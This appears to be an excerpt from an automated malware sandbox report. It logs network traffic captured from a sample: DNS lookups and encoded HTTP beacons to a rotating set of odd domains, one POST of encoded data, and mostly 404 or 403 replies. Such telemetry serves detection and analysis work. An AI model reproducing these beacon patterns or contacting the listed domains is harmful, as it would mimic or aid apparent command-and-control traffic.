Source: global traffic	HTTP traffic detected: GET /xh7d/?ezK=xFOxVPb0UzRXXPy&FLL4t=lbj31sdPKdIucqFOkkGE3KM3+04tAjUV11hc/ilEwtgrKZz4woi/xCbjO8SSPcCwKsmvKoPyP7HvBY60bpiIs0q+jugQSLxZIHi4ORfVnf3fP4vxqk9k0cQ= HTTP/1.1Host: www.gokulmohan.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic	HTTP traffic detected: GET /a3g3/?FLL4t=wGzSOeLMOeJZKE1qNEa+jhNIWFM/28bU2ce+YDYhk9OHSMfA8Wvg3+EpArxXMTGJwIf87CGML3FOIiYWeXpTMV044XgXGpvZX0LmL4PHT1yh05kop8D3Fas=&ezK=xFOxVPb0UzRXXPy HTTP/1.1Host: www.wddb97.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic	HTTP traffic detected: GET /3m9t/?FLL4t=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHiHBruo5ppO8xHCx+tj/iffFnkB/SDXcvjAJfIbSWg6DSwwu1sipuRv+U7XkBw=&ezK=xFOxVPb0UzRXXPy HTTP/1.1Host: www.roopiedutech.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic	HTTP traffic detected: GET /aajw/?FLL4t=lJ+qR9qEWHtEYfdYXX38H63zdICQzTmBsURfekuXE7iDW/5kFwCD5SzXO8//IXYeWe3pPDw5e3u+RAlULoDse9ZEd7r2QSdjEk66OCO0EG57H2Th8v5BKcw=&ezK=xFOxVPb0UzRXXPy HTTP/1.1Host: www.comvq.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic	HTTP traffic detected: GET /aq3t/?FLL4t=1O//PO/cqhkw/M+6iRVvEUqUFpAHj9+zOvfmk/yFAMIwiCaNxlH8ewyD3Z9q+hl0ISYsRyjGuCz6Y2WWdkpFnlpJlJcmiRtBOVbaf0BxDZMN5gC7nH7np4E=&ezK=xFOxVPb0UzRXXPy HTTP/1.1Host: www.harmonid.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4

Source: global traffic	DNS traffic detected: DNS query: www.iuyi542.xyz
Source: global traffic	DNS traffic detected: DNS query: www.vrxlzluy.shop
Source: global traffic	DNS traffic detected: DNS query: www.trifecta.center
Source: global traffic	DNS traffic detected: DNS query: www.wcp95.top
Source: global traffic	DNS traffic detected: DNS query: www.gokulmohan.online
Source: global traffic	DNS traffic detected: DNS query: www.wddb97.top
Source: global traffic	DNS traffic detected: DNS query: www.xtelify.tech
Source: global traffic	DNS traffic detected: DNS query: www.roopiedutech.online
Source: global traffic	DNS traffic detected: DNS query: www.comvq.fun
Source: global traffic	DNS traffic detected: DNS query: www.harmonid.life
Source: global traffic	DNS traffic detected: DNS query: www.figa1digital.services

Source: unknown

HTTP traffic detected: POST /o91n/ HTTP/1.1Host: www.vrxlzluy.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usCache-Control: no-cacheConnection: closeContent-Length: 202Content-Type: application/x-www-form-urlencodedOrigin: http://www.vrxlzluy.shopReferer: http://www.vrxlzluy.shop/o91n/User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4Data Raw: 46 4c 4c 34 74 3d 65 6a 42 61 32 59 47 74 50 65 6f 70 49 41 64 75 6a 74 31 70 61 41 52 33 35 43 58 58 6d 79 61 49 2f 6d 35 59 48 59 6e 51 37 74 4b 51 73 72 2b 5a 48 2b 2b 4c 42 55 48 79 4c 6c 38 66 53 39 67 7a 36 6d 48 4c 42 63 67 65 33 57 75 77 34 2b 45 45 79 62 50 59 56 2b 6f 79 45 77 6b 78 49 74 4d 4b 48 76 58 46 4f 6b 46 61 6d 4e 79 49 57 47 64 58 61 34 6f 4b 74 6c 5a 54 51 56 30 6b 61 68 76 76 4b 50 79 32 4e 74 7a 72 6c 76 62 2f 64 34 73 76 61 48 5a 67 47 52 6c 2f 48 44 66 32 30 55 54 50 51 63 56 72 5a 63 42 5a 75 5a 4f 58 42 4f 65 70 6b 68 69 53 54 32 32 75 34 4d 4c 32 73 61 4f 39 6a 77 3d 3d Data Ascii: FLL4t=ejBa2YGtPeopIAdujt1paAR35CXXmyaI/m5YHYnQ7tKQsr+ZH++LBUHyLl8fS9gz6mHLBcge3Wuw4+EEybPYV+oyEwkxItMKHvXFOkFamNyIWGdXa4oKtlZTQV0kahvvKPy2Ntzrlvb/d4svaHZgGRl/HDf20UTPQcVrZcBZuZOXBOepkhiST22u4ML2saO9jw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 06:11:40 GMTContent-Type: text/htmlContent-Length: 167433Connection: closeETag: "652641ca-28e09"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 06:12:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-litespeed-tag: 59f_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://vrxlzluy.shop/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zem9MhqEVTnIVzROOp7XG%2Fs%2B%2F4BO2RADfyt4mM0y8wNosg3DtA%2F39YY3E5oo8BNdHZYx89P0x8dU06QTFg%2FdDX%2Fz%2FcW1bomHbTYJn9Qn8D%2F74uQb%2F0Oz8UmEO5Kzp97o4%2F%2FqRw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ddab09a0cd06bda-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10810&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 63 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 1a 69 73 9c 38 f6 f3 f8 57 60 5c d3 86 09 d0 d0 87 db a6 4d 26 3b 39 f6 a8 cc 38 15 27 b5 b5 65 bb 52 02 3d 68 39 20 b1 92 e8 23 3d fc f7 2d 01 dd 4d 1f 8e 3d de d9 75 2a 09 3c bd 5b ef 92 f0 e5 f1 9b ab d7 9f fe f5 e1 ad 36 91 59 fa f2 e8 52 fd a7 a5 88 26 81 0e d4 fe 7c ad 6b 39 87 98 cc 03 9d 25 be 36 91 32 17 7e b7 cb 92 dc c9 a0 4b c5 89 ae 45 29 12 22 d0 53 86 30 a1 89 2d 88 04 8d 32 fb 5e e8 8a 1d 20 fc f2 e8 87 cb 0c 24 d2 a2 09 e2 02 64 a0 7f fe f4 ce 3e d7 b5 ae 5a 49 09 fd Data Ascii: dceis8W`\M&;98'eR=h9 #=-M=u*<[6YR&\|k9%62~KE)"S0-2^ $d>ZI
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 06:12:25 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 06:12:28 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 06:12:30 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 06:12:33 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Nov 2024 06:12:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1WJZp4kAxQSXq5LqPsqRKFgwlCl5Ji%2BADb33SQ9d9IJ35CVFIFam6bw9vvlA7U32MEOdM9Nv%2FLq%2BoEwqbw2Fzpov3Cp9hKg8lh4pSit9isLvhUws1n42HUnPABrhGDTlQqT%2FRh160yc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ddab180eb120bd9-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1319&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=720&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 02 2c Data Ascii: 581Vmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?,
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Nov 2024 06:12:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oZ6gtaDp2SVJl20PphZrcEGUBxbF467kJw%2F4sWqIyTe%2FcA8UtiyTrbWhqmMJvN48aFRWjT30om8Yog7n85MeepGVlrKIp6to5XXmrBpQwmv2l47NnxCbTeQ6n%2F0oDjPA%2BW12HxtRAQc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ddab190fc50e916-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1065&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 02 2c Data Ascii: 58cVmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?,
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Nov 2024 06:12:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=svvEtT2il9XQzcq%2FqHj5l7fPOl9ctjDSU4eEgC1lnESotmu%2BO4w1nR8Yfze1KpHd3hvts%2BOfx1c4%2FvLtF1p9sr8gC4ChlxmfOBKhD9TBFxPnsc10inPTbKLim59vRp1aem9RP5OClBc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ddab1a0ef213ace-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1308&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10822&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd Data Ascii: 58cVmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 06:12:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l6Fck%2FoEhQQG2BxIAyh2CfF1AWwDyVFnpLjBxd7A96CkS2EyEoZnIkyPhkdrmyf2PuuWKOsQdOIBPUEzxRg13CM5MryaBHF4R%2B3ayPm0NLbSbKsgBKdaR%2BLk9Ivq%2B3ajtO%2BRggpap8s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ddab1b0bff547ac-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2324&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=450&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 63 61 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 61 74 20 2f 78 68 37 64 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 4e 45 2c 4e 4f 41 52 43 48 49 56 45 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 68 74 6d 6c 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 30 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 2a 20 7b 20 Data Ascii: ca6<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>Page not found at /xh7d/</title> <meta name="robots" content="NONE,NOARCHIVE"> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * {
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 06:12:53 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 06:12:56 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 06:12:56 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 06:12:58 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 06:13:01 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
